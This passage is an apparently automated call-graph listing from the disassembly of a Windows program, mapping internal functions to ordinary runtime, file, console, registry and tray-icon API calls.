API calls 101909->101910 101910->101908 101912 7e4705 101911->101912 101913 7e46f0 101911->101913 101912->101894 102081 7e8b28 58 API calls __getptd_noexit 101913->102081 101915 7e46f5 102082 7e8db6 9 API calls __strnicmp_l 101915->102082 101917 7e4700 101917->101894 101919 7f0a0e type_info::_Type_info_dtor 101918->101919 101920 7f0a1b 101919->101920 101921 7f0a32 101919->101921 102098 7e8af4 58 API calls __getptd_noexit 101920->102098 101922 7f0abd 101921->101922 101925 7f0a42 101921->101925 102103 7e8af4 58 API calls __getptd_noexit 101922->102103 101924 7f0a20 102099 7e8b28 58 API calls __getptd_noexit 101924->102099 101928 7f0a6a 101925->101928 101929 7f0a60 101925->101929 101932 7ed206 ___lock_fhandle 59 API calls 101928->101932 102100 7e8af4 58 API calls __getptd_noexit 101929->102100 101930 7f0a65 102104 7e8b28 58 API calls __getptd_noexit 101930->102104 101934 7f0a70 101932->101934 101936 7f0a8e 101934->101936 101937 7f0a83 101934->101937 101935 7f0ac9 102105 7e8db6 9 API calls __strnicmp_l 101935->102105 102101 7e8b28 58 API calls __getptd_noexit 101936->102101 102083 7f0add 101937->102083 101941 7f0a27 type_info::_Type_info_dtor 101941->101896 101942 7f0a89 102102 7f0ab5 LeaveCriticalSection __unlock_fhandle 101942->102102 101944->101887 101945->101886 101947 7ed892 type_info::_Type_info_dtor 101946->101947 101948 7ed89f 101947->101948 101949 7ed8b6 101947->101949 102047 7e8af4 58 API calls __getptd_noexit 101948->102047 101951 7ed955 101949->101951 101954 7ed8ca 101949->101954 102053 7e8af4 58 API calls __getptd_noexit 101951->102053 101953 7ed8a4 102048 7e8b28 58 API calls __getptd_noexit 101953->102048 101955 7ed8e8 101954->101955 101956 7ed8f2 101954->101956 102049 7e8af4 58 API calls __getptd_noexit 101955->102049 101974 7ed206 101956->101974 101960 7ed8ed 102054 7e8b28 58 API calls __getptd_noexit 101960->102054 101961 7ed8f8 101963 7ed91e 101961->101963 101964 7ed90b 101961->101964 102050 7e8b28 58 API calls __getptd_noexit 101963->102050 101983 7ed975 101964->101983 101965 7ed961 102055 7e8db6 9 API calls __strnicmp_l 101965->102055 101969 7ed8ab type_info::_Type_info_dtor 101969->101906 101970 7ed917 102052 7ed94d LeaveCriticalSection __unlock_fhandle 101970->102052 101971 7ed923 102051 7e8af4 58 API calls __getptd_noexit 101971->102051 101975 7ed212 type_info::_Type_info_dtor 101974->101975 101976 7ed261 EnterCriticalSection 101975->101976 101977 7e9c0b __lock 58 API calls 101975->101977 101978 7ed287 type_info::_Type_info_dtor 101976->101978 101979 7ed237 101977->101979 101978->101961 101980 7ed24f 101979->101980 102056 7e9e2b InitializeCriticalSectionAndSpinCount 101979->102056 102057 7ed28b LeaveCriticalSection _doexit 101980->102057 101984 7ed982 __ftell_nolock 101983->101984 101985 7ed9e0 101984->101985 101986 7ed9c1 101984->101986 102015 7ed9b6 101984->102015 101989 7eda38 101985->101989 101990 7eda1c 101985->101990 102067 7e8af4 58 API calls __getptd_noexit 101986->102067 101987 7ec5f6 __crtLCMapStringA_stat 6 API calls 101991 7ee1d6 101987->101991 101994 7eda51 101989->101994 102073 7f18c1 60 API calls 3 library calls 101989->102073 102070 7e8af4 58 API calls __getptd_noexit 101990->102070 101991->101970 101992 7ed9c6 102068 7e8b28 58 API calls __getptd_noexit 101992->102068 102058 7f5c6b 101994->102058 101996 7eda21 102071 7e8b28 58 API calls __getptd_noexit 101996->102071 101998 7ed9cd 102069 7e8db6 9 API calls __strnicmp_l 101998->102069 102002 7eda5f 102003 7eddb8 102002->102003 102074 7e99ac 58 API calls 2 library calls 102002->102074 102005 7ee14b WriteFile 102003->102005 102006 7eddd6 102003->102006 102004 7eda28 102072 7e8db6 9 API calls __strnicmp_l 102004->102072 102009 7eddab GetLastError 102005->102009 102016 7edd78 102005->102016 102010 7edefa 102006->102010 102019 7eddec 102006->102019 102009->102016 102013 7edf05 102010->102013 102032 7edfef 102010->102032 102011 7eda8b GetConsoleMode 102011->102003 102014 7edaca 102011->102014 102012 7ee184 102012->102015 102079 7e8b28 58 API calls __getptd_noexit 102012->102079 102013->102012 102027 7edf6a WriteFile 102013->102027 102014->102003 102017 7edada GetConsoleCP 102014->102017 102015->101987 102016->102012 102016->102015 102021 7eded8 102016->102021 102017->102012 102043 7edb09 102017->102043 102018 7ede5b WriteFile 102018->102009 102022 7ede98 102018->102022 102019->102012 102019->102018 102024 7ee17b 102021->102024 102025 7edee3 102021->102025 102022->102019 102035 7edebc 102022->102035 102023 7ee1b2 102080 7e8af4 58 API calls __getptd_noexit 102023->102080 102078 7e8b07 58 API calls 2 library calls 102024->102078 102076 7e8b28 58 API calls __getptd_noexit 102025->102076 102026 7ee064 WideCharToMultiByte 102026->102009 102039 7ee0ab 102026->102039 102027->102009 102029 7edfb9 102027->102029 102029->102013 102029->102016 102029->102035 102032->102012 102032->102026 102033 7edee8 102077 7e8af4 58 API calls __getptd_noexit 102033->102077 102034 7ee0b3 WriteFile 102038 7ee106 GetLastError 102034->102038 102034->102039 102035->102016 102038->102039 102039->102016 102039->102032 102039->102034 102039->102035 102040 7f7a5e WriteConsoleW CreateFileW __putwch_nolock 102045 7edc5f 102040->102045 102041 7f62ba 60 API calls __write_nolock 102041->102043 102042 7edbf2 WideCharToMultiByte 102042->102016 102044 7edc2d WriteFile 102042->102044 102043->102016 102043->102041 102043->102042 102043->102045 102075 7e35f5 58 API calls __isleadbyte_l 102043->102075 102044->102009 102044->102045 102045->102009 102045->102016 102045->102040 102045->102043 102046 7edc87 WriteFile 102045->102046 102046->102009 102046->102045 102047->101953 102048->101969 102049->101960 102050->101971 102051->101970 102052->101969 102053->101960 102054->101965 102055->101969 102056->101980 102057->101976 102059 7f5c76 102058->102059 102060 7f5c83 102058->102060 102061 7e8b28 __strnicmp_l 58 API calls 102059->102061 102063 7f5c8f 102060->102063 102064 7e8b28 __strnicmp_l 58 API calls 102060->102064 102062 7f5c7b 102061->102062 102062->102002 102063->102002 102065 7f5cb0 102064->102065 102066 7e8db6 __strnicmp_l 9 API calls 102065->102066 102066->102062 102067->101992 102068->101998 102069->102015 102070->101996 102071->102004 102072->102015 102073->101994 102074->102011 102075->102043 102076->102033 102077->102015 102078->102015 102079->102023 102080->102015 102081->101915 102082->101917 102106 7ed4c3 102083->102106 102085 7f0b41 102119 7ed43d 59 API calls 2 library calls 102085->102119 102086 7f0aeb 102086->102085 102088 7f0b1f 102086->102088 102090 7ed4c3 __chsize_nolock 58 API calls 102086->102090 102088->102085 102091 7ed4c3 __chsize_nolock 58 API calls 102088->102091 102089 7f0b49 102092 7f0b6b 102089->102092 102120 7e8b07 58 API calls 2 library calls 102089->102120 102093 7f0b16 102090->102093 102094 7f0b2b CloseHandle 102091->102094 102092->101942 102096 7ed4c3 __chsize_nolock 58 API calls 102093->102096 102094->102085 102097 7f0b37 GetLastError 102094->102097 102096->102088 102097->102085 102098->101924 102099->101941 102100->101930 102101->101942 102102->101941 102103->101930 102104->101935 102105->101941 102107 7ed4ce 102106->102107 102109 7ed4e3 102106->102109 102121 7e8af4 58 API calls __getptd_noexit 102107->102121 102113 7ed508 102109->102113 102123 7e8af4 58 API calls __getptd_noexit 102109->102123 102110 7ed4d3 102122 7e8b28 58 API calls __getptd_noexit 102110->102122 102113->102086 102114 7ed512 102124 7e8b28 58 API calls __getptd_noexit 102114->102124 102116 7ed4db 102116->102086 102117 7ed51a 102125 7e8db6 9 API calls __strnicmp_l 102117->102125 102119->102089 102120->102092 102121->102110 102122->102116 102123->102114 102124->102117 102125->102116 102127 7e079e __ftell_nolock 102126->102127 102128 7e079f GetLongPathNameW 102127->102128 102129 7c7bcc 59 API calls 102128->102129 102130 7c72bd 102129->102130 102131 7c700b 102130->102131 102132 7c7667 59 API calls 102131->102132 102133 7c701d 102132->102133 102134 7c4750 60 API calls 102133->102134 102135 7c7028 102134->102135 102136 7c7033 102135->102136 102139 7fe885 102135->102139 102138 7c3f74 59 API calls 102136->102138 102140 7c703f 102138->102140 102141 7fe89f 102139->102141 102184 7c7908 61 API calls 102139->102184 102178 7c34c2 102140->102178 102143 7c7052 Mailbox 102143->101320 102145 7c4ddd 136 API calls 102144->102145 102146 7c688f 102145->102146 102147 7fe031 102146->102147 102149 7c4ddd 136 API calls 102146->102149 102148 82955b 122 API calls 102147->102148 102150 7fe046 102148->102150 102151 7c68a3 102149->102151 102152 7fe04a 102150->102152 102153 7fe067 102150->102153 102151->102147 102154 7c68ab 102151->102154 102157 7c4e4a 84 API calls 102152->102157 102158 7e0db6 Mailbox 59 API calls 102153->102158 102155 7c68b7 102154->102155 102156 7fe052 102154->102156 102185 7c6a8c 102155->102185 102291 8242f8 90 API calls _wprintf 102156->102291 102157->102156 102177 7fe0ac Mailbox 102158->102177 102162 7fe060 102162->102153 102163 7fe260 102164 7e2d55 _free 58 API calls 102163->102164 102165 7fe268 102164->102165 102166 7c4e4a 84 API calls 102165->102166 102171 7fe271 102166->102171 102170 7e2d55 _free 58 API calls 102170->102171 102171->102170 102172 7c4e4a 84 API calls 102171->102172 102295 81f7a1 89 API calls 4 library calls 102171->102295 102172->102171 102174 7c7de1 59 API calls 102174->102177 102177->102163 102177->102171 102177->102174 102277 7c750f 102177->102277 102285 7c735d 102177->102285 102292 81f73d 59 API calls 2 library calls 102177->102292 102293 81f65e 61 API calls 2 library calls 102177->102293 102294 82737f 59 API calls Mailbox 102177->102294 102179 7c34d4 102178->102179 102183 7c34f3 _memmove 102178->102183 102181 7e0db6 Mailbox 59 API calls 102179->102181 102180 7e0db6 Mailbox 59 API calls 102182 7c350a 102180->102182 102181->102183 102182->102143 102183->102180 102184->102139 102186 7fe41e 102185->102186 102187 7c6ab5 102185->102187 102368 81f7a1 89 API calls 4 library calls 102186->102368 102301 7c57a6 60 API calls Mailbox 102187->102301 102190 7fe431 102369 81f7a1 89 API calls 4 library calls 102190->102369 102191 7c6ad7 102302 7c57f6 67 API calls 102191->102302 102193 7c6aec 102193->102190 102194 7c6af4 102193->102194 102196 7c7667 59 API calls 102194->102196 102198 7c6b00 102196->102198 102197 7fe44d 102200 7c6b61 102197->102200 102303 7e0957 60 API calls __ftell_nolock 102198->102303 102202 7c6b6f 102200->102202 102203 7fe460 102200->102203 102201 7c6b0c 102205 7c7667 59 API calls 102201->102205 102204 7c7667 59 API calls 102202->102204 102206 7c5c6f CloseHandle 102203->102206 102207 7c6b78 102204->102207 102208 7c6b18 102205->102208 102209 7fe46c 102206->102209 102210 7c7667 59 API calls 102207->102210 102211 7c4750 60 API calls 102208->102211 102212 7c4ddd 136 API calls 102209->102212 102214 7c6b81 102210->102214 102215 7c6b26 102211->102215 102213 7fe488 102212->102213 102216 7fe4b1 102213->102216 102219 82955b 122 API calls 102213->102219 102306 7c459b 102214->102306 102304 7c5850 ReadFile SetFilePointerEx 102215->102304 102370 81f7a1 89 API calls 4 library calls 102216->102370 102223 7fe4a4 102219->102223 102220 7c6b98 102224 7c7b2e 59 API calls 102220->102224 102222 7c6b52 102305 7c5aee SetFilePointerEx SetFilePointerEx 102222->102305 102226 7fe4cd 102223->102226 102227 7fe4ac 102223->102227 102228 7c6ba9 SetCurrentDirectoryW 102224->102228 102230 7c4e4a 84 API calls 102226->102230 102229 7c4e4a 84 API calls 102227->102229 102234 7c6bbc Mailbox 102228->102234 102229->102216 102232 7fe4d2 102230->102232 102231 7c6d0c Mailbox 102296 7c57d4 102231->102296 102233 7e0db6 Mailbox 59 API calls 102232->102233 102235 7fe506 102233->102235 102237 7e0db6 Mailbox 59 API calls 102234->102237 102241 7c750f 59 API calls 102235->102241 102239 7c6bcf 102237->102239 102238 7c3bbb 102238->101179 102238->101188 102240 7c522e 59 API calls 102239->102240 102266 7c6bda Mailbox __wsetenvp 102240->102266 102274 7fe54f Mailbox 102241->102274 102242 7c6ce7 102364 7c5c6f 102242->102364 102244 7fe740 102375 8272df 59 API calls Mailbox 102244->102375 102246 7c6cf3 SetCurrentDirectoryW 102246->102231 102249 7fe762 102376 83fbce 59 API calls 2 library calls 102249->102376 102252 7fe76f 102254 7e2d55 _free 58 API calls 102252->102254 102253 7fe7d9 102379 81f7a1 89 API calls 4 library calls 102253->102379 102254->102231 102257 7fe7f2 102257->102242 102258 7c750f 59 API calls 102258->102274 102259 7fe7d1 102378 81f5f7 59 API calls 4 library calls 102259->102378 102261 7c7de1 59 API calls 102261->102266 102266->102242 102266->102253 102266->102259 102266->102261 102357 7c586d 67 API calls _wcscpy 102266->102357 102358 7c6f5d GetStringTypeW 102266->102358 102359 7c6ecc 60 API calls __wcsnicmp 102266->102359 102360 7c6faa GetStringTypeW __wsetenvp 102266->102360 102361 7e363d GetStringTypeW _iswctype 102266->102361 102362 7c68dc 165 API calls 3 library calls 102266->102362 102363 7c7213 59 API calls Mailbox 102266->102363 102267 7c7de1 59 API calls 102267->102274 102270 7fe792 102377 81f7a1 89 API calls 4 library calls 102270->102377 102273 7fe7ab 102275 7e2d55 _free 58 API calls 102273->102275 102274->102244 102274->102258 102274->102267 102274->102270 102371 81f73d 59 API calls 2 library calls 102274->102371 102372 81f65e 61 API calls 2 library calls 102274->102372 102373 82737f 59 API calls Mailbox 102274->102373 102374 7c7213 59 API calls Mailbox 102274->102374 102276 7fe4c8 102275->102276 102276->102231 102278 7c75af 102277->102278 102281 7c7522 _memmove 102277->102281 102280 7e0db6 Mailbox 59 API calls 102278->102280 102279 7e0db6 Mailbox 59 API calls 102282 7c7529 102279->102282 102280->102281 102281->102279 102283 7e0db6 Mailbox 59 API calls 102282->102283 102284 7c7552 102282->102284 102283->102284 102284->102177 102286 7c7370 102285->102286 102289 7c741e 102285->102289 102288 7e0db6 Mailbox 59 API calls 102286->102288 102290 7c73a2 102286->102290 102287 7e0db6 59 API calls Mailbox 102287->102290 102288->102290 102289->102177 102290->102287 102290->102289 102291->102162 102292->102177 102293->102177 102294->102177 102295->102171 102297 7c5c6f CloseHandle 102296->102297 102298 7c57dc Mailbox 102297->102298 102299 7c5c6f CloseHandle 102298->102299 102300 7c57eb 102299->102300 102300->102238 102301->102191 102302->102193 102303->102201 102304->102222 102305->102200 102307 7c7667 59 API calls 102306->102307 102308 7c45b1 102307->102308 102309 7c7667 59 API calls 102308->102309 102310 7c45b9 102309->102310 102311 7c7667 59 API calls 102310->102311 102312 7c45c1 102311->102312 102313 7c7667 59 API calls 102312->102313 102314 7c45c9 102313->102314 102315 7c45fd 102314->102315 102316 7fd4d2 102314->102316 102317 7c784b 59 API calls 102315->102317 102318 7c8047 59 API calls 102316->102318 102319 7c460b 102317->102319 102320 7fd4db 102318->102320 102321 7c7d2c 59 API calls 102319->102321 102322 7c7d8c 59 API calls 102320->102322 102323 7c4615 102321->102323 102325 7c4640 102322->102325 102324 7c784b 59 API calls 102323->102324 102323->102325 102327 7c4636 102324->102327 102326 7c4680 102325->102326 102328 7c465f 102325->102328 102339 7fd4fb 102325->102339 102329 7c784b 59 API calls 102326->102329 102331 7c7d2c 59 API calls 102327->102331 102333 7c79f2 59 API calls 102328->102333 102330 7c4691 102329->102330 102334 7c46a3 102330->102334 102337 7c8047 59 API calls 102330->102337 102331->102325 102332 7fd5cb 102335 7c7bcc 59 API calls 102332->102335 102336 7c4669 102333->102336 102338 7c46b3 102334->102338 102340 7c8047 59 API calls 102334->102340 102352 7fd588 102335->102352 102336->102326 102343 7c784b 59 API calls 102336->102343 102337->102334 102342 7c46ba 102338->102342 102344 7c8047 59 API calls 102338->102344 102339->102332 102341 7fd5b4 102339->102341 102351 7fd532 102339->102351 102340->102338 102341->102332 102347 7fd59f 102341->102347 102345 7c8047 59 API calls 102342->102345 102354 7c46c1 Mailbox 102342->102354 102343->102326 102344->102342 102345->102354 102346 7c79f2 59 API calls 102346->102352 102350 7c7bcc 59 API calls 102347->102350 102348 7fd590 102349 7c7bcc 59 API calls 102348->102349 102349->102352 102350->102352 102351->102348 102355 7fd57b 102351->102355 102352->102326 102352->102346 102380 7c7924 59 API calls 2 library calls 102352->102380 102354->102220 102356 7c7bcc 59 API calls 102355->102356 102356->102352 102357->102266 102358->102266 102359->102266 102360->102266 102361->102266 102362->102266 102363->102266 102365 7c5c88 102364->102365 102366 7c5c79 102364->102366 102365->102366 102367 7c5c8d CloseHandle 102365->102367 102366->102246 102367->102366 102368->102190 102369->102197 102370->102276 102371->102274 102372->102274 102373->102274 102374->102274 102375->102249 102376->102252 102377->102273 102378->102253 102379->102257 102380->102352 102382 7c6d95 102381->102382 102386 7c6ea9 102381->102386 102383 7e0db6 Mailbox 59 API calls 102382->102383 102382->102386 102385 7c6dbc 102383->102385 102384 7e0db6 Mailbox 59 API calls 102391 7c6e31 102384->102391 102385->102384 102386->101326 102389 7c735d 59 API calls 102389->102391 102390 7c750f 59 API calls 102390->102391 102391->102386 102391->102389 102391->102390 102394 7c6240 102391->102394 102419 816553 59 API calls Mailbox 102391->102419 102392->101328 102393->101330 102420 7c7a16 102394->102420 102396 7c6265 102397 7c646a 102396->102397 102402 7c7d8c 59 API calls 102396->102402 102403 7c750f 59 API calls 102396->102403 102404 7fdff6 102396->102404 102406 7c6799 _memmove 102396->102406 102412 7fdf92 102396->102412 102416 7c7e4f 59 API calls 102396->102416 102425 7c5f6c 60 API calls 102396->102425 102426 7c5d41 59 API calls Mailbox 102396->102426 102427 7c5e72 60 API calls 102396->102427 102428 7c7924 59 API calls 2 library calls 102396->102428 102398 7c750f 59 API calls 102397->102398 102399 7c6484 Mailbox 102398->102399 102399->102391 102402->102396 102403->102396 102429 81f8aa 91 API calls 4 library calls 102404->102429 102430 81f8aa 91 API calls 4 library calls 102406->102430 102409 7fe004 102410 7c750f 59 API calls 102409->102410 102411 7fe01a 102410->102411 102411->102399 102413 7c8029 59 API calls 102412->102413 102415 7fdf9d 102413->102415 102418 7e0db6 Mailbox 59 API calls 102415->102418 102417 7c643b CharUpperBuffW 102416->102417 102417->102396 102418->102406 102419->102391 102421 7e0db6 Mailbox 59 API calls 102420->102421 102422 7c7a3b 102421->102422 102423 7c8029 59 API calls 102422->102423 102424 7c7a4a 102423->102424 102424->102396 102425->102396 102426->102396 102427->102396 102428->102396 102429->102409 102430->102399 102431->101344 102432->101345 102434 7c4196 102433->102434 102435 7fd423 102433->102435 102434->101351 102459 822f94 62 API calls _W_store_winword 102434->102459 102435->102434 102436 7fd42c DestroyIcon 102435->102436 102436->102434 102438 7c416f Mailbox 102437->102438 102439 7c4098 102437->102439 102438->101357 102440 7c7a16 59 API calls 102439->102440 102441 7c40a6 102440->102441 102442 7fd3c8 LoadStringW 102441->102442 102443 7c40b3 102441->102443 102446 7fd3e2 102442->102446 102444 7c7bcc 59 API calls 102443->102444 102445 7c40c8 102444->102445 102445->102446 102447 7c40d9 102445->102447 102448 7c7b2e 59 API calls 102446->102448 102449 7c4174 102447->102449 102450 7c40e3 102447->102450 102453 7fd3ec 102448->102453 102451 7c8047 59 API calls 102449->102451 102452 7c7b2e 59 API calls 102450->102452 102456 7c40ed _memset _wcscpy 102451->102456 102452->102456 102454 7c7cab 59 API calls 102453->102454 102453->102456 102455 7fd40e 102454->102455 102457 7c7cab 59 API calls 102455->102457 102458 7c4155 Shell_NotifyIconW 102456->102458 102457->102456 102458->102438 102459->101351 102461 7ce6d5 102460->102461 102462 7ce73f 102461->102462 102463 803aa9 102461->102463 102474 7ce799 102461->102474 102467 7c7667 59 API calls 102462->102467 102462->102474 102464 7c9ea0 331 API calls 102463->102464 102465 803abe 102464->102465 102490 7ce970 Mailbox 102465->102490 102612 829e4a 89 API calls 4 library calls 102465->102612 102466 7c7667 59 API calls 102466->102474 102469 803b04 102467->102469 102471 7e2d40 __cinit 67 API calls 102469->102471 102470 7e2d40 __cinit 67 API calls 102470->102474 102471->102474 102472 803b26 102472->101434 102473 7c84c0 69 API calls 102473->102490 102474->102466 102474->102470 102474->102472 102475 7ce95a 102474->102475 102474->102490 102475->102490 102613 829e4a 89 API calls 4 library calls 102475->102613 102476 7c9ea0 331 API calls 102476->102490 102478 7c8d40 59 API calls 102478->102490 102481 829e4a 89 API calls 102481->102490 102487 803e25 102487->101434 102488 7cf195 102617 829e4a 89 API calls 4 library calls 102488->102617 102489 7cea78 102489->101434 102490->102473 102490->102476 102490->102478 102490->102481 102490->102488 102490->102489 102611 7c7f77 59 API calls 2 library calls 102490->102611 102614 816e8f 59 API calls 102490->102614 102615 83c5c3 331 API calls 102490->102615 102616 83b53c 331 API calls Mailbox 102490->102616 102618 7c9c90 59 API calls Mailbox 102490->102618 102619 8393c6 331 API calls Mailbox 102490->102619 102492 7cf4ba 102491->102492 102493 7cf650 102491->102493 102494 7cf4c6 102492->102494 102495 80441e 102492->102495 102496 7c7de1 59 API calls 102493->102496 102712 7cf290 331 API calls 2 library calls 102494->102712 102714 83bc6b 331 API calls Mailbox 102495->102714 102502 7cf58c Mailbox 102496->102502 102499 80442c 102503 7cf630 102499->102503 102715 829e4a 89 API calls 4 library calls 102499->102715 102501 7cf4fd 102501->102499 102501->102502 102501->102503 102507 7c4e4a 84 API calls 102502->102507 102620 83445a 102502->102620 102629 82cb7a 102502->102629 102709 823c37 102502->102709 102503->101434 102505 7cf5e3 102505->102503 102713 7c9c90 59 API calls Mailbox 102505->102713 102507->102505 102873 7c8180 102510->102873 102512 7cfd3d 102513 80472d 102512->102513 102574 7d06f6 102512->102574 102878 7cf234 102512->102878 102895 829e4a 89 API calls 4 library calls 102513->102895 102517 7cfe3e 102521 7cfe4c 102517->102521 102544 80488d 102517->102544 102899 8166ec 59 API calls 2 library calls 102517->102899 102518 7cfdd3 102518->102517 102520 7d0517 102518->102520 102523 804755 102518->102523 102525 7e0db6 59 API calls Mailbox 102518->102525 102531 7d0545 _memmove 102518->102531 102550 804742 102518->102550 102555 7c9ea0 331 API calls 102518->102555 102565 80480c 102518->102565 102519 804b53 102519->102550 102912 829e4a 89 API calls 4 library calls 102519->102912 102528 7e0db6 Mailbox 59 API calls 102520->102528 102521->102519 102537 8048f9 102521->102537 102882 7c837c 102521->102882 102543 8047d7 102523->102543 102896 7cf6a3 331 API calls 102523->102896 102525->102518 102528->102531 102529 8048b2 Mailbox 102529->102521 102902 8166ec 59 API calls 2 library calls 102529->102902 102530 804848 102900 8160ef 59 API calls 2 library calls 102530->102900 102545 7e0db6 Mailbox 59 API calls 102531->102545 102536 804917 102542 804928 102536->102542 102904 7c85c0 59 API calls Mailbox 102536->102904 102537->102536 102903 7c85c0 59 API calls Mailbox 102537->102903 102538 7cfea4 102548 804ad6 102538->102548 102549 7cff32 102538->102549 102584 7d0179 Mailbox _memmove 102538->102584 102539 80486b 102540 7c9ea0 331 API calls 102539->102540 102540->102544 102542->102584 102905 8160ab 59 API calls Mailbox 102542->102905 102543->102550 102897 829e4a 89 API calls 4 library calls 102543->102897 102544->102521 102544->102550 102901 83a2d9 85 API calls Mailbox 102544->102901 102588 7d0106 _memmove 102545->102588 102910 829ae7 60 API calls 102548->102910 102552 7e0db6 Mailbox 59 API calls 102549->102552 102554 7cff39 102552->102554 102558 7d09d0 331 API calls 102554->102558 102554->102574 102555->102518 102556 804a4d 102557 7c9ea0 331 API calls 102556->102557 102559 804a87 102557->102559 102561 7cffb2 102558->102561 102559->102550 102562 7c84c0 69 API calls 102559->102562 102561->102531 102568 7cffe6 102561->102568 102561->102574 102567 804ab2 102562->102567 102898 829e4a 89 API calls 4 library calls 102565->102898 102909 829e4a 89 API calls 4 library calls 102567->102909 102573 7c8047 59 API calls 102568->102573 102576 7d0007 102568->102576 102570 7e0db6 59 API calls Mailbox 102570->102584 102573->102576 102894 829e4a 89 API calls 4 library calls 102574->102894 102575 7d0398 102575->101434 102576->102574 102577 804b24 102576->102577 102579 7d004c 102576->102579 102911 7c9d3c 60 API calls Mailbox 102577->102911 102579->102519 102579->102574 102580 7d00d8 102579->102580 102889 7c9d3c 60 API calls Mailbox 102580->102889 102582 804a1c 102585 7e0db6 Mailbox 59 API calls 102582->102585 102583 7d00eb 102583->102574 102890 7c82df 59 API calls Mailbox 102583->102890 102584->102556 102584->102567 102584->102570 102584->102574 102584->102575 102584->102582 102891 7c8740 68 API calls __cinit 102584->102891 102892 7c8660 68 API calls 102584->102892 102906 825937 68 API calls 102584->102906 102907 7c89b3 69 API calls Mailbox 102584->102907 102908 7c9d3c 60 API calls Mailbox 102584->102908 102585->102556 102588->102584 102589 7d0162 102588->102589 102893 7c9c90 59 API calls Mailbox 102588->102893 102589->101434 102590->101434 102591->101434 102592->101364 102593->101369 102594->101434 102595->101371 102596->101371 102597->101371 102598->101434 102599->101434 102600->101434 102601->101434 102602->101434 102603->101434 102604->101418 102605->101418 102606->101418 102607->101418 102608->101418 102609->101418 102610->101418 102611->102490 102612->102490 102613->102490 102614->102490 102615->102490 102616->102490 102617->102487 102618->102490 102619->102490 102621 7c9837 84 API calls 102620->102621 102622 834494 102621->102622 102623 7c6240 94 API calls 102622->102623 102624 8344a4 102623->102624 102625 8344c9 102624->102625 102626 7c9ea0 331 API calls 102624->102626 102628 8344cd 102625->102628 102716 7c9a98 59 API calls Mailbox 102625->102716 102626->102625 102628->102505 102630 7c7667 59 API calls 102629->102630 102631 82cbaf 102630->102631 102632 7c7667 59 API calls 102631->102632 102633 82cbb8 102632->102633 102634 82cbcc 102633->102634 102826 7c9b3c 59 API calls 102633->102826 102636 7c9837 84 API calls 102634->102636 102637 82cbe9 102636->102637 102638 82ccea 102637->102638 102639 82cc0b 102637->102639 102644 82cd1a Mailbox 102637->102644 102641 7c4ddd 136 API calls 102638->102641 102640 7c9837 84 API calls 102639->102640 102642 82cc17 102640->102642 102643 82ccfe 102641->102643 102645 7c8047 59 API calls 102642->102645 102646 82cd16 102643->102646 102649 7c4ddd 136 API calls 102643->102649 102644->102505 102648 82cc23 102645->102648 102646->102644 102647 7c7667 59 API calls 102646->102647 102650 82cd4b 102647->102650 102653 82cc37 102648->102653 102654 82cc69 102648->102654 102649->102646 102651 7c7667 59 API calls 102650->102651 102652 82cd54 102651->102652 102656 7c7667 59 API calls 102652->102656 102657 7c8047 59 API calls 102653->102657 102655 7c9837 84 API calls 102654->102655 102658 82cc76 102655->102658 102659 82cd5d 102656->102659 102660 82cc47 102657->102660 102662 7c8047 59 API calls 102658->102662 102663 7c7667 59 API calls 102659->102663 102661 7c7cab 59 API calls 102660->102661 102664 82cc51 102661->102664 102665 82cc82 102662->102665 102666 82cd66 102663->102666 102667 7c9837 84 API calls 102664->102667 102827 824a31 GetFileAttributesW 102665->102827 102669 7c9837 84 API calls 102666->102669 102670 82cc5d 102667->102670 102672 82cd73 102669->102672 102673 7c7b2e 59 API calls 102670->102673 102671 82cc8b 102674 82cc9e 102671->102674 102677 7c79f2 59 API calls 102671->102677 102675 7c459b 59 API calls 102672->102675 102673->102654 102676 7c9837 84 API calls 102674->102676 102684 82cca4 102674->102684 102678 82cd8e 102675->102678 102680 82cccb 102676->102680 102677->102674 102679 7c79f2 59 API calls 102678->102679 102681 82cd9d 102679->102681 102828 8237ef 75 API calls Mailbox 102680->102828 102683 82cdd1 102681->102683 102685 7c79f2 59 API calls 102681->102685 102686 7c8047 59 API calls 102683->102686 102684->102644 102687 82cdae 102685->102687 102688 82cddf 102686->102688 102687->102683 102690 7c7bcc 59 API calls 102687->102690 102689 7c7b2e 59 API calls 102688->102689 102691 82cded 102689->102691 102692 82cdc3 102690->102692 102693 7c7b2e 59 API calls 102691->102693 102694 7c7bcc 59 API calls 102692->102694 102694->102683 102869 82445a GetFileAttributesW 102709->102869 102712->102501 102713->102505 102714->102499 102715->102503 102716->102628 102826->102634 102827->102671 102828->102684 102870 823c3e 102869->102870 102871 824475 FindFirstFileW 102869->102871 102870->102505 102871->102870 102872 82448a FindClose 102871->102872 102872->102870 102874 7c818f 102873->102874 102877 7c81aa 102873->102877 102875 7c7e4f 59 API calls 102874->102875 102876 7c8197 CharUpperBuffW 102875->102876 102876->102877 102877->102512 102879 7cf251 102878->102879 102880 7cf272 102879->102880 102913 829e4a 89 API calls 4 library calls 102879->102913 102880->102518 102883 7c838d 102882->102883 102884 7fedbd 102882->102884 102885 7e0db6 Mailbox 59 API calls 102883->102885 102886 7c8394 102885->102886 102887 7c83b5 102886->102887 102914 7c8634 59 API calls Mailbox 102886->102914 102887->102537 102887->102538 102889->102583 102890->102588 102891->102584 102892->102584 102893->102588 102894->102513 102895->102550 102896->102543 102897->102550 102898->102550 102899->102530 102900->102539 102901->102529 102902->102529 102903->102536 102904->102542 102905->102584 102906->102584 102907->102584 102908->102584 102909->102550 102910->102568 102911->102519 102912->102550 102913->102880 102914->102887 102916 7c7a5f 102915->102916 102917 7c7a85 _memmove 102915->102917 102916->102917 102918 7e0db6 Mailbox 59 API calls 102916->102918 102917->101443 102919 7c7ad4 102918->102919 102920 7e0db6 Mailbox 59 API calls 102919->102920 102920->102917 102921->101444 102922 7c1055 102927 7c2649 102922->102927 102925 7e2d40 __cinit 67 API calls 102926 7c1064 102925->102926 102928 7c7667 59 API calls 102927->102928 102929 7c26b7 102928->102929 102934 7c3582 102929->102934 102932 7c2754 102933 7c105a 102932->102933 102937 7c3416 59 API calls 2 library calls 102932->102937 102933->102925 102938 7c35b0 102934->102938 102937->102932 102939 7c35bd 102938->102939 102940 7c35a1 102938->102940 102939->102940 102941 7c35c4 RegOpenKeyExW 102939->102941 102940->102932 102941->102940 102942 7c35de RegQueryValueExW 102941->102942 102943 7c35ff 102942->102943 102944 7c3614 RegCloseKey 102942->102944 102943->102944 102944->102940 102945 7c1066 102950 7cf76f 102945->102950 102947 7c106c 102948 7e2d40 __cinit 67 API calls 102947->102948 102949 7c1076 102948->102949 102951 7cf790 102950->102951 102983 7dff03 102951->102983 102955 7cf7d7 102956 7c7667 59 API calls 102955->102956 102957 7cf7e1 102956->102957 102958 